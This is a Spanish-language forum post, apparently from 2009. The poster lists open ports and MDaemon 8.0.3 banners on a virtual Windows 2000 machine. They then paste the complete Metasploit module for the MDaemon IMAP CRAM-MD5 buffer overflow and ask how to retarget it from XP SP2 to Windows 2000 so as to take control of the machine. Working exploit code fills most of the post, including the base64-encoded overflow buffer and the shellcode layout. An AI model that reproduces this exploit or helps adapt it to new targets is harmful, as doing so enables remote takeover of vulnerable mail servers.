Haber les hablo claro para que porfavor no borren el tema..

Las pruebas las efectuo en una Pc virtual...

Tengo el sistema Windows 2000 con todos estos puertos abiertos y una pila mas q' no podren a no ser que alguien aqui me pregunte si lo esta...

* + 192.168.0.12
   |___    25 
      |___ 220 smallnet.com ESMTP MDaemon 8.0.3; Mon, 31 Aug 2009 13:49:40 -0400..
   |___    53 
   |___    80 
   |___   110 
      |___ +OK smallnet.com POP MDaemon 8.0.3 ready <MDAEMON-F200908311349.AA4942234MD5829@smallnet.com>..
   |___   135 
   |___   143  Imap
      |___ * OK smallnet.com IMAP4rev1 MDaemon 8.0.3 ready..
   |___   443 


Probe el Kaht2 y no funciona entonces me fije que el IMAP que tiene instalado viene en el Metasploit el cual no es necesario loguearse como el del 9xxx, pero el que viene es para Windows XP Sp2 alguien sabe que tengo que cambiar para ver si funciona en el 2000.

Este es el code...

##
# $Id: mdaemon_cram_md5.rb 5773 2008-10-19 21:03:39Z ramon $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

   include Msf::Exploit::Remote::Imap

   def initialize(info = {})
      super(update_info(info,   
         'Name'           => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
         'Description'    => %q{
            This module exploits a buffer overflow in the CRAM-MD5
            authentication of the MDaemon IMAP service. This
            vulnerability was discovered by Muts.
               
         },
         'Author'         => [ 'anonymous' ],
         'License'        => BSD_LICENSE,
         'Version'        => '$Revision: 5773 $',
         'References'     =>
            [
               [ 'OSVDB', '11838'],
               [ 'CVE', '2004-1520'],
               [ 'BID', '11675'],
               [ 'MIL', '90'],

            ],
         'Privileged'     => true,
         'DefaultOptions' =>
            {
               'EXITFUNC' => 'process',
            },         
         'Payload'        =>
            {
               'Space'    => 500,
               'BadChars' => "\x00",
               'StackAdjustment' => -3500,

            },
         'Platform'       => 'win',
         'Targets'        =>
            [
               [ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
            ],
         'DisclosureDate' => 'Nov 12 2004',
         'DefaultTarget' => 0))
   end

   def exploit
      connect
      
      print_status("Asking for CRAM-MD5 authentication...")
      sock.put("a001 authenticate cram-md5\r\n")
      res = sock.get_once
      
      
      print_status("Received CRAM-MD5 answer: #{res.chomp}")
      # Magic no return-address exploitation ninjaness!
      buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
      req = Rex::Text.encode_base64(buf) + "\r\n"
      sock.put(req)
      res = sock.get_once
      
      print_status("Received authentication reply: #{res.chomp}")
      print_status("Sending LOGOUT to close the thread and trigger an exception")
      sock.put("a002 LOGOUT\r\n")
      res = sock.get_once
      
      print_status("Received LOGOUT reply: #{res.chomp}")
      sleep(1)
      
      handler
      disconnect
   end

end

Si alguien tiene alguna idea para testear y ver si logro tomar control del pc y me la puede plantear, thx igual


Salu2 y grx